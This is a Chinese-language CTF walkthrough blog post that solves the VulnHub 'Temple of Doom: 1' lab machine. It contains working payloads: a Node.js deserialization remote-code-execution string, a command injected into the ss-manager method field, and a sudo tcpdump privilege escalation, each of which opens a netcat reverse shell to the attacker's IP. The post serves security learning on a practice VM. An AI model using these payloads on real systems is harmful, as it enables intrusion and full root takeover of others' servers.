VulnHub-Temple of Doom: 1

admin 2022年6月27日09:48:11安全文章评论5 views2937字阅读9分47秒阅读模式

大余安全  

一个每日分享渗透小技巧的公众号VulnHub-Temple of Doom: 1



大家好,这里是 大余安全 的第 29 篇文章,本公众号会每日分享攻防渗透技术给大家。



VulnHub-Temple of Doom: 1

靶机地址:https://www.vulnhub.com/entry/temple-of-doom-1,243/

靶机难度:中级(CTF)

靶机发布日期:2018年6月8日

靶机描述:

[+]由https://twitter.com/0katz创建的CTF

[+]难度:简单/中级

[+]在VirtualBox中测试

[+]注意:2种扎根方法!--来自谷歌翻译

目标:得到root权限&找到flag.txt


请注意:对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

VulnHub-Temple of Doom: 1
VulnHub-Temple of Doom: 1




VulnHub-Temple of Doom: 1

一、信息收集

VulnHub-Temple of Doom: 1


VulnHub-Temple of Doom: 1

我们在VM中需要确定攻击目标的IP地址,需要使用nmap获取目标IP地址:

VulnHub-Temple of Doom: 1

我们已经找到了此次CTF目标计算机IP地址:192.168.56.126 (当然,第一张图就显示了IP....)

VulnHub-Temple of Doom: 1

nmap扫出开放了22和666端口...(有Node.js)

22先放着吧,没账号密码进不去的...666是http服务,去看看....

VulnHub-Temple of Doom: 1

正在建设一个页面...让我稍后再来...等不急了爆破它

VulnHub-Temple of Doom: 1

竟然什么都没有....用nikto试试...

VulnHub-Temple of Doom: 1

第一次使用nikto和dirb都扫不出一点信息....

这边我截取下他的会话cookie试试...

VulnHub-Temple of Doom: 1

发现服务器端响应中正在发送会话cookie....

使用Burp Decoder对Cookie值进行解码....

VulnHub-Temple of Doom: 1

第一次解码他会标记%3符号...我选择base64继续进行解码,出现了:

u32t4o3tb3gg431fs34ggdgchjwnza0l=

看上面可以确定在会话cookie中传递了用户名csrftoken和expires参数...

VulnHub-Temple of Doom: 1

再次刷新后,返回了错误的提示...

发现Web服务正在使用JSON,并且Nmap扫描中有Node.js框架,在谷歌上搜索

[exploit node.js](https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/)

看看...

说存在反序列化漏洞利用...我这边先测试下是否存在...用反序列化函数试试...

VulnHub-Temple of Doom: 1

VulnHub-Temple of Doom: 1

果然有反序列化漏洞存在...

[参考](https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/)



VulnHub-Temple of Doom: 1

二、提权

VulnHub-Temple of Doom: 1


参考链接后,可以学习到怎么去提权...


VulnHub-Temple of Doom: 1

VulnHub-Temple of Doom: 1

{"username":"_ND_FUNC_function(){return require('child_process').execSync('whoami',(e,out,err)=>{console.log(out);}); }()"}       
_  ND_FUNC  _ function():在本地执行一个函数child_process是node.js中的一个模块,它以类似于popen(3)的方式生成子进程。child_process.exec()方法:此方法在控制台中运行命令并缓冲输出(上面框架的命令可以套用...遇到反序列化漏洞,上面美元符号不能打...报错...)它指定字符串Shell执行命令(在UNIX上默认:'/ bin / sh'

制作的Shell可以知道Linux系统上的当前用户是谁,编码进行转发....

VulnHub-Temple of Doom: 1

当前用户为nodeadmin......

VulnHub-Temple of Doom: 1

我们执行ls -lart查找下目录底层信息看看...

VulnHub-Temple of Doom: 1

这边直接创建nc 对/bin/bash输入开启服务...(反向netcat shell命令)

VulnHub-Temple of Doom: 1

VulnHub-Temple of Doom: 1

命令:{"username":"_$$ND_FUNC_function(){return require('child_process').execSync('nc -e /bin/bash 192.168.56.103 6666',(e,out,err)=>{console.log(out);}); }()"}python -c 'import pty;pty.spawn("/bin/bash")'  (进入tty shell )

VulnHub-Temple of Doom: 1

没有权限进入fireman目录...

看看fireman是否有root权限去运行它...

VulnHub-Temple of Doom: 1

ss-manager是作为根来运行的...ss-manager容易受到远程代码执行的影响...

[参考](https://github.com/shadowsocks/shadowsocks-libev/issues/1734)

ss-manager是Shadowsocks的缩写

Shadowsocks-libev是用于嵌入式的服务和安全SOCKS5作为代理,ss-manager用于控制多个用户的shadowsocks服务器,并在需要时生成新服务器...就是能创建新服务去利用...

VulnHub-Temple of Doom: 1

创建服务器....

VulnHub-Temple of Doom: 1

add: {"server_port":8003, "password":"test", "method":"||nc -e /bin/sh 192.168.56.103 4444 ||"}

VulnHub-Temple of Doom: 1

进入fireman用户....

sudo -l查看下有哪些可以提权的目录或者文件...

VulnHub-Temple of Doom: 1

存在tcpdump,可以用于远程代码执行...

[参考](https://github.com/xapax/security/blob/master/privilege_escalation_-_linux.md)

VulnHub-Temple of Doom: 1

VulnHub-Temple of Doom: 1

命令:echo "nc -e /bin/bash 192.168.56.103 1234" > dayu命令:sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/dayu -Z root

将目录更改为tmp,使用反向netcat shell创建了一个名为dayu的文件,将该文件的文件权限更改为RWX,最后将sudo和tcp dump用于远程代码执行....

VulnHub-Temple of Doom: 1

VulnHub-Temple of Doom: 1

成功获取root和flag文件...介绍说有两种方法可以获取...


VulnHub-Temple of Doom: 1

这边我回想了下,一路过来都是Node.js--ss-manager--tcpdump这条路过来的....


因为只开了22和666端口,目前还没想到第二种方法能渗透的....如果有大神能想到...请留言给我,感谢!!一起学习,一起加油!!!


由于我们已经成功得到root权限&找到flag.txt,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。


如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

VulnHub-Temple of Doom: 1
VulnHub-Temple of Doom: 1



如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~

VulnHub-Temple of Doom: 1
VulnHub-Temple of Doom: 1


VulnHub-Temple of Doom: 1


欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!

VulnHub-Temple of Doom: 1

大余安全

一个全栈渗透小技巧的公众号

VulnHub-Temple of Doom: 1

原文始发于微信公众号(大余安全):VulnHub-Temple of Doom: 1

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月27日09:48:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  VulnHub-Temple of Doom: 1 http://cn-sec.com/archives/892881.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: